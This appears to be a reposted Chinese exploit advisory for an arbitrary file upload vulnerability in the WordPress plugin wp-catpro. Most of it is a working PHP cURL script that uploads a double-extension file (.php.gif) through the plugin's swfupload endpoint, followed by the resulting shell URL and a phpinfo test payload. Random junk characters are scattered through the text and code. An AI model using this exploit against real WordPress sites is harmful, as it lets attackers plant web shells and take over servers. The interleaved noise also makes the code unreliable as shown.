WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
# `" J5 O- D3 o#-----------------------------------------------------------------------
; G" U, N1 b7 n, N5 a8 b" a; @
作者  => Zikou-16
( g5 F$ m9 M# v0 K  h: c邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
7 ^! D& o9 T' l! T- c5 R------------------
' V& i5 e% R3 U3 M9 J7 N# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
' f- O: E5 \! B0 `) ?) B# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
+ N5 x8 Q* T0 e7 @$ }3 m. ~# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

5 p9 \& J6 m: c0 f* _#=> Exploit
" b, ]& X* W9 C3 U. i, O( l-----------
2 Z, i9 u, J1 ]+ N<?php
- O% g/ L3 g" |0 L3 S
$uploadfile="zik.php.gif";
4 `. V+ A+ \6 P  X4 _$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* n) i1 X  j) X0 |# y/ s/ vcurl_setopt($ch, CURLOPT_POST, true);
5 l3 b4 L: A+ t7 G8 Ecurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 E; W/ a; z, j$postResult = curl_exec($ch);
curl_close($ch);
$ Y7 h+ u1 Y  ?$ f2 d
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
, |8 o% ^/ {+ \$ |2 J2 e<?php
/ i8 d: v5 e5 \2 B! sphpinfo();
/ }5 ~# J$ f1 f# N?>